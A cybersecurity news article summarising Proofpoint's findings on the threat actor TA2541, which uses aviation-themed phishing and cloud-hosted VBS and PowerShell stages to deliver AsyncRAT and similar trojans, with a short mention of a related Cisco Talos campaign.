Threat actor TA2541 targets aviation industry to distribute AsyncRAT

Researchers from Proofpoint have spotted an advanced persistent threat actor (APT) dubbed TA2541 that has been targeting entities in the aviation industry to distribute AsyncRAT malware.

Proofpoint has tracked the threat actor since 2017 and observed TA2541 has been using similar methods to target victims and then distribute remote access trojans (RATs), like its recent malware choice AsyncRAT, used to remotely control compromised systems.

“TA2541 uses themes related to aviation, transportation, and travel. When Proofpoint first started tracking this actor, the group sent macro-laden Microsoft Word attachments that downloaded the RAT payload. The group pivoted, and now they more frequently send messages with links to cloud services such as Google Drive hosting the payload,” Proofpoint wrote in the blog post.

TA2541 attack chain

Proofpoint described the TA2541 attack chain in Figure A below:

Figure A: TA2541 attack chain (Proofpoint)

As noted in the attack chain, the actors use Google Drive URLs in transportation-themed phishing emails, which are used to divert victims to Google Drive that hosts malicious VBS files.

Proofpoint also added that OneDrive is also occasionally used to host malicious files. In late 2021, they also observed the use of DiscordApp URLs, a popular content delivery network (CDN) also used by bad actors, linking to a compressed file which led to either AgentTesla or Imminent Monitor.

Once executed, the VBS files then invokes PowerShell to pull an executable from a text file hosted on various platforms such as Pastetext, Sharetext, and GitHub.

“The threat actor executes PowerShell into various Windows processes and queries Windows Management Instrumentation (WMI) for security products such as antivirus and firewall software, and attempts to disable built-in security protections,” Proofpoint added.

In the next stage, the APT actors will collect system information before downloading the AsyncRAT onto the victim’s system. Other poplular RATs that may be used include NetWire, WSH RAT, and Parallax.

Proofpoint concluded “with high confidence this threat actor will continue using the same TTPs observed in historic activity with minimal change to its lure themes, delivery, and installation,” as well as continue using AsyncRAT, vjw0rm, and other commodity malware in future campaigns.

Other recent RAT campaigns

This past January, the Cisco Talos cybersecurity team also discovered a malicious campaign delivering variants of RATs to include Nanocore, Netwire and Async variants targeting user’s information.

According to Cisco, the threat actor leveraged public cloud services (such as AWS or Azure) to deploy and deliver variants of commodity remote access trojans (RATs) with the information stealing capability starting around Oct. 26, 2021. Campaign victims are primarily distributed across the United States, Italy and Singapore.